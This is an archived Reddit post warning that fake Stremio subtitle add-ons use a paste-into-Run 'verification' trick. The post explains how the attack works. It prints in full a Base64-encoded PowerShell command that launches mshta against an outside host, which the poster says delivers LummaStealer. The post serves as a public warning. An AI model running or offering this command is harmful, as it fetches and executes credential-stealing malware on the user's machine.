this post was submitted on 23 Aug 2024
This is an automated archive made by the Lemmit Bot.

The original was posted on /r/piracy by /u/MagicAnes on 2024-08-23 10:15:37+00:00.


Hey everyone,

I wanted to share a recent experience I had with Stremio, hoping it might save some of you from getting hacked. I was browsing the community add-ons in Stremio and saw the OpenSubtitles and Subscene add-ons. I thought they might come in handy for subtitles, so I decided to configure them.

The setup seemed easy – just follow the on-screen instructions. I selected the language for the subtitles, but when I tried to install the add-on, it prompted me to complete some sort of verification step. The instructions were simple:

  1. Press Win + R
  2. Press Ctrl + V
  3. Click OK

I pressed Ctrl + V and was surprised to see the following code appear, even though I hadn’t copied anything myself:

"powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==" Don't execute it.

This seemed strange, so I decided to investigate. When I scanned the code, I found that it was a PowerShell command with an encoded payload.

Here's what I found:

  • **-eC**: This parameter tells PowerShell to execute a command that is provided in encoded form (Base64 encoded).
  • The decoded command using Base64 is:

mshta ""

What This Command Does:

  • mshta: Launches the Microsoft HTML Application Host, which can execute HTML applications (HTA files).
  • "": This URL is opened by the command, which can potentially execute harmful code hosted on the page.

Downloading the file from this link gives you an .exe file named "DIALER.EXE". I scanned this file using VirusTotal, and it showed that 50 out of 57 antivirus engines detected it as Trojan.LummaStealer/Mikey.

You can see the VirusTotal report here: [VirusTotal Link]

Please be careful when installing any community add-ons on anything, and double-check any verification steps they ask you to complete by scanning the URLs and files.

Stay safe everyone!
